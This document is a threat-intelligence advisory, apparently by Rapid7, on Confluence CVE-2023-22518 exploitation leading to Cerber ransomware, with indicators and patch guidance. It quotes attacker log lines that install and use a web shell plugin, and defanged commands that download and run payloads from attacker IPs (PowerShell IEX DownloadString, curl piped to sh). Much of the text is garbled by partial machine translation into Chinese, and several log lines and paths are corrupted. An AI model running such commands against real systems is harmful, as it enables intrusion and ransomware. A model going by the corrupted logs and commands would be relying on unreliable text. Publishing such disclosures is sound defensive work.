Rapid7-Observed Exploitation of Atlassian Confluence CVE-2023-22518

最后更新于2023年11月10日星期五19:23:07 GMT

Daniel Lydon and Conor Quinn contributed attacker behavior insights to this blog.

As of November 5, 2023, Rapid7 管理检测和响应 (MDR) is observing exploitation of Atlassian Confluence in multiple customer environments, 包括用于部署勒索软件. We have confirmed that at least some of the exploits are targeting CVE-2023-22518, an improper authorization vulnerability affecting Confluence Data Center and Confluence Server. Atlassian published an advisory for the vulnerability on October 31, 2023. MDR也观察到有人企图利用 CVE-2023-22515, a critical broken access control vulnerability in Confluence that came to light on October 4.

Atlassian更新了他们的 CVE-2023-22518 on November 3 to note that exploitation of the vulnerability had been reported to them by a customer.

观察到的攻击者行为

Beginning November 5, 2023, Rapid7 MDR began responding to exploitation of Confluence Server within various customer environments. The alerts we observed occurred between 2023-11-05 10:08:34 and 23:05:35 UTC.

流程执行链, for the most part, 在多个环境中是否一致, indicating possible mass exploitation of vulnerable internet-facing Atlassian Confluence servers.

Rapid7 observed POST HTTP访问日志中的请求(/ atlassian /融合/日志)在Windows和Linux上运行. 请求被发送到 /json/setup-restore.action?synchronous=true，如下例所示:

[05/Nov/ 20123:11:54:54 +0000] - SYSTEMNAME 193.176.179[.POST /json/setup-restore.action?同步HTTP / 1 = true.1 302 44913ms - - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML，像壁虎)Chrome/74.0.3729.169 Safari/537.36
[05/Nov/2023:11:56:09 +0000] admin SYSTEMNAME 193.176.179[.GET /rest/plugins/.0/?os_authType =基本HTTP / 1.1 200 153ms 388712 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML，像壁虎)Chrome/117.0.5938.132 Safari/537.36
[05/Nov/2023:11:56:10 +0000] admin SYSTEMNAME 193.176.179[./rest/plugins/.0/web.shell.Plugin-key HTTP/1.1 404 3ms 40 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML，像壁虎)Chrome/117.0.5938.132 Safari/537.36
[05/Nov/2023:11:56:10 +0000] admin SYSTEMNAME 193.176.179[.POST /rest/plugins/.0/?令牌= -TOKENNUM HTTP / 1.1 202 26ms 344 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML，像壁虎)Chrome/117.0.5938.132 Safari/537.36
[05/Nov/2023:11:56:11 +0000] admin SYSTEMNAME 193.176.179[.GET /rest/plugins/.0/tasks/1f5049f1-6fd7-471d-937c-7afbe3158019 HTTP/1.229 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML，像壁虎)Chrome/117.0.5938.132 Safari/537.36
[05/Nov/ 20123:11:56:16 +0000] admin SYSTEMNAME 193.176.179[.GET /rest/plugins/.0/tasks/1f5049f1-6fd7-471d-937c-7afbe3158019 HTTP/1.1 200 3ms 274 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML，像壁虎)Chrome/117.0.5938.132 Safari/537.36
[11/11/56:16 +0000] admin SYSTEMNAME 193.176.179[.POST /plugins/servlet/com.jsos.shell/ShellServlet?act=3 HTTP/1.212 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML，像壁虎)Chrome/74.0.3729.169 Safari/537.36
[05/Nov/ 20123:11:56:17 +0000] admin SYSTEMNAME 193.176.179[.POST /plugins/servlet/com.jsos.shell/ShellServlet?act=3 HTTP/1.1 200 13ms 283 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML，像壁虎)Chrome/74.0.3729.169 Safari/537.36
[05/Nov/ 20123:11:56:17 +0000] admin SYSTEMNAME 193.176.179[.POST /plugins/servlet/com.jsos.shell/ShellServlet?act=3 HTTP/1.1 200 14ms 556 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML，像壁虎)Chrome/74.0.3729.169 Safari/537.36
[05/Nov/ 20123:11:56:18 +0000] admin SYSTEMNAME 193.176.179[./rest/plugins/.0/web.shell.Plugin-key HTTP/1.1 204 129ms——Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML，像壁虎)Chrome/117.0.5938.132 Safari/537.36

Rapid7 managed services observed the following processes on the host systems as part of exploitation:

• Linux

Parent process:

/ opt / atlassian /融合/ jre / / bin / java -Djava.util.logging.config.文件= / opt / atlassian /融合/ conf /日志记录.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize = 2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK = XXXX -Datlassian.plugins.startup.options= -Dorg.apache.tomcat.websocket.DEFAULT_BUFFER_SIZE = 32768 -Dconfluence.context.path= -Djava.locale.供应商= JRE, SPI,系统-Dsynchrony.enable.xhr.回退= true -Datlassian.plugins.enable.wait=300 -Djava.awt.headless=true -Xloggc:/opt/ atlassian /融合/日志/gc-YYYY-MM-DD_XX-XX-XX.log -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=5 -XX:GCLogFileSize=2M -Xlog:gc+age=debug:file=/opt/ atlassian /融合/日志/gc-YYYY-MM-DD_XX-XX-XX.log::filecount=5,filesize=2M -XX:G1ReservePercent=20 -XX:+UseG1GC -XX:+ExplicitGCInvokesConcurrent -XX:+PrintGCDateStamps -XX:+IgnoreUnrecognizedVMOptions -XX:ReservedCodeCacheSize=256m -Xms1024m -Xmx1024m -Dignore.endorsed.dirs= -classpath /opt/atlassian/confluence/bin/bootstrap.jar: / opt / atlassian / / bin / tomcat-juli汇合.jar -Dcatalina.= / opt / atlassian /融合-Dcatalina基地.家= / opt / atlassian / -Djava汇合.io.tmpdir = / opt / atlassian /融合/临时组织.apache.catalina.startup.Bootstrap start

Child process:

/usr/bin/bash -c whoami
其他命令(已解码和去混淆):
echo -n hxxp://193.176.179[.]41/agae > /tmp/lru
echo -n hxxp://193.43.72[.]11/mdrg > /tmp/lru

• Windows

Parent process:

“开车:\ \融合\ bin \ tomcat9汇合.exe”“/ / RS / /融合”

Child processes:

cmd /c whoami 

其他命令(已解码和去混淆):
IEX((New-Object Net.WebClient).DownloadString(“hxxp [:] / / 193 (.]176[.]179[.]41/tmp.37")) 

Post-exploitation行为

在初始枚举活动(whoami 命令通过Bash生成), the adversary executed Base64 commands to spawn follow-on commands via python2 or python3.

/usr/bin/bash -c whoami
echo -n hxxp://193.176.179[.]41/agae > /tmp/lru
uname -p 2> /dev/null (spawned by /usr/bin/python3.6)
-u(由/usr/bin/python3生成.6)
/bin/chmod +x ./qnetd(由/usr/bin/python3生成.6)
/bin/chmod 755 ./qnetd(由/usr/bin/python3生成.6)
/tmp/qnetd(勒索软件执行)

—-----------------------------------------
/usr/bin/bash -c whoami
echo -n hxxp://193.43.72[.]11/mdrg > /tmp/lru
curl -s hxxp://193.43.72[.]11/mdrg.. sh || wget -q - o - hxxp://.43.72[.]11/mdrg[.]sh)%7Csh 
/usr/bin/cat /tmp/lru(由/usr/bin/bash生成)
/usr/bin/uname -m(由/usr/bin/bash生成)
/usr/bin/rm -rf /tmp/lru (spawned by /usr/bin/bash)
/usr/bin/rm -rf sh(由/usr/bin/bash生成)
-u(由/usr/bin/bash生成) 
/usr/bin/rm -rf ./qnetd(由/usr/bin/bash生成)
/usr/bin/chmod +x ./qnetd(由/usr/bin/bash生成)
/usr/bin/chmod 755 ./qnetd(由/usr/bin/bash生成)
/usr/bin/rm -rf ./qnetd(由/usr/bin/python2生成.7)
(由/usr/bin/python2生成.7)
-u(由/usr/bin/python2生成.7) 
/usr/bin/chmod +x ./qnetd(由/usr/bin/python2生成.7)
/usr/bin/chmod 755 ./qnetd(由/usr/bin/python2生成.7)
/tmp/qnetd(勒索软件执行)

在多个攻击链中, Rapid7 observed post-exploitation command execution to download a malicious payload hosted at 193.43.72[.]11 and/or 193.176.179[.]41, which, if successful, led to single-system Cerber ransomware deployment on the exploited Confluence server.

Mitigation guidance

All versions of Confluence Server and Confluence Data Center are vulnerable to CVE-2023-22518. The vulnerability has been remediated in the following fixed versions:

• 7.19.16
• 8.3.4
• 8.4.4
• 8.5.3
• 8.6.1

Atlassian Cloud users are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.

Customers should update to a fixed version of Confluence on an emergency basis, restricting external access to the application at least until they are able to remediate. If you are unable to restrict access to the application or update on an emergency basis, Atlassian’s advisory includes interim measures you can take to mitigate risk from known attack vectors. As always, Rapid7 strongly recommends applying vendor-supplied patches rather than relying solely on temporary mitigations.

妥协指标

IP addresses:

• 193.176.179[.]41
• 193.43.72[.]11
• 45.145.6[.]112

Domains:
j3qxmk6g5sk3zw62i2yhjnwmhm55rfz47fdyfkhaithlpelfjdokdxad[.]onion

File hashes:

• Bat file: /tmp/agttydcb.bat —MD5: 81b760d4057c7c704f18c3f6b3e6b2c4

• ELF勒索软件二进制文件: /tmp/qnetd - SHA256: 4ed46b98d047f5ed26553c6f4fded7209933ca9632b998d265870e3557a5cdfe

Ransom note: read-me3.txt

MITRE ATT&CK企业技术

Resource Development:
获取基础设施(T1583)
开发能力(T1587)
获取能力(T1588)
舞台能力(T1608)

Initial Access:
利用面向公众的应用程序(T1190)

Execution:
命令和脚本解释器(T1059)

Defense Evasion:
File Directory & 权限修改(T1222)
拆卸指示灯(T1070)

Impact:
数据加密影响(T1486)

Rapid7 customers

InsightVM and Nexpose customers can assess their exposure to CVE-2023-22518 with an unauthenticated check available as of the November 1, 2023 content release.

InsightIDR and 管理检测和响应 customers have existing detection coverage through Rapid7's expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. The following detection rules are deployed and alerting on activity related to Atlassian Confluence exploitation:

• Suspicious Process - Confluence Java App Launching Processes
• Webshell -由Webserver启动的命令